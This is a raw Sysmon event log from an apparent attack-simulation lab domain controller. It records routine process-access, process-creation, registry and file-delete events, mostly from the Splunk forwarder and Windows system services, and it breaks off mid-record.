13:53:17.552{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200302Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:17.552{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200301Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:17.552{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200300Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:17.552{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200299Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:17.552{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E64D-6040-D64D-00000000AD01}3864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200298Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:17.552{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E64D-6040-D64D-00000000AD01}3864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200297Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:17.553{5ABCFE62-E64D-6040-D64D-00000000AD01}3864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200296Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:17.145{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A8AE90FDBC38DD45C3DD1B041F10FF8,SHA256=1B60D140DE09A69E70E0D51E4ED83EBDCEB000B8D97BA31D912076009BD8CA9D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200327Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:18.895{5ABCFE62-E64E-6040-D84D-00000000AD01}59243900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200326Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:18.755{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E64E-6040-D84D-00000000AD01}5924C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200325Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:18.755{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200324Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:18.755{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200323Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:18.755{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200322Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:18.755{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200321Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:18.755{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E64E-6040-D84D-00000000AD01}5924C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200320Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:18.755{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E64E-6040-D84D-00000000AD01}5924C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200319Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:18.756{5ABCFE62-E64E-6040-D84D-00000000AD01}5924C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200318Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:18.599{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=49A75B7AC61FA8F014608F186635EDE5,SHA256=51D660812DB89211EDCD4FF9D3B8FBFBD345F439722F93469D637C2A95DA5672,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000002200317Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:53:18.505{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\20FED10E-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_20FED10E-0000-0000-0000-100000000000.XML 13241300x80000000000000002200316Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:53:18.505{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\0992B788-1468-4F36-93BE-112B21933E91\Config SourceDWORD (0x00000001) 13241300x80000000000000002200315Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:53:18.505{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\0992B788-1468-4F36-93BE-112B21933E91\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_0992B788-1468-4F36-93BE-112B21933E91.XML 10341000x80000000000000002200314Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:18.302{5ABCFE62-E64E-6040-D74D-00000000AD01}64205992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200313Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:18.177{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E64E-6040-D74D-00000000AD01}6420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200312Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:18.177{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200311Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:18.177{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200310Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:18.177{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200309Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:18.177{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200308Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:18.177{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E64E-6040-D74D-00000000AD01}6420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200307Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:18.177{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E64E-6040-D74D-00000000AD01}6420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200306Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:18.178{5ABCFE62-E64E-6040-D74D-00000000AD01}6420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200305Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:18.145{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1176B739CFFF2E9089BB1C8F65DD6EA,SHA256=F734553810D680856FBFF17D0ED811624BEB8EB87430EAFA1BB1CE00899903D4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200343Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:16.360{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT 